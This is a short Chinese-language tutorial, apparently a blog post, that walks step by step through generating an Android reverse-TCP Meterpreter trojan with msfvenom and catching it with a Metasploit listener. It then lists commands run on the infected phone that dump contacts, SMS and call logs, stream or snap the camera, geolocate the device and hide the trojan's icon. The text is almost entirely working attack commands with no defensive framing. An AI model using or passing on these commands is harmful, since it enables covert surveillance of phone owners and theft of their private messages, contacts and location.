1.查看kali的IP 2.输入生成反弹木马命令: msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.21.128 lport=55555 R > /home/1.apk 3.启动msfconsole,配置相关参数 msfconsole //启动msfconsole use exploit/multi/handler //加载模块 set payload android/meterpreter/reverse_tcp //选择Payload set lhost 192.168.21.128 //这里的地址设置成我们刚才生成木马的IP地址 set lport 55555 //这里的端口设置成刚才我们生成木马所监听的端口 exploit //开始执行漏洞 开始监听,等待手机上线 4.将1.apk上传至手机,并且安装运行 5.查看手机信息 sysinfo 6.查看手机有多少个摄像头 webcam_list 7.开启摄像头 webcam_stream 8.导出电话号码 dump_contacts 9.导出短信信息 dump_sms 10.通过摄像头拍照功能 webcam_snap 11.其他命令 hide_app_icon //隐藏手机端木马程序图标 dump_calllog //获取通话记录 geolocate //获取手机的当前的经纬度 set_audio_mode //Set Ringer Mode sqlite_query //Query a SQLite database from storage wakelock // Enable/Disable Wakelock wlan_geolocate // Get current lat-long using WLAN information app_install // Request to install apk file app_list // List installed apps in the device app_run // Start Main Activty for package name app_uninstall //Request to uninstall application OK,就分享至此,其他命令请自行研究! |
|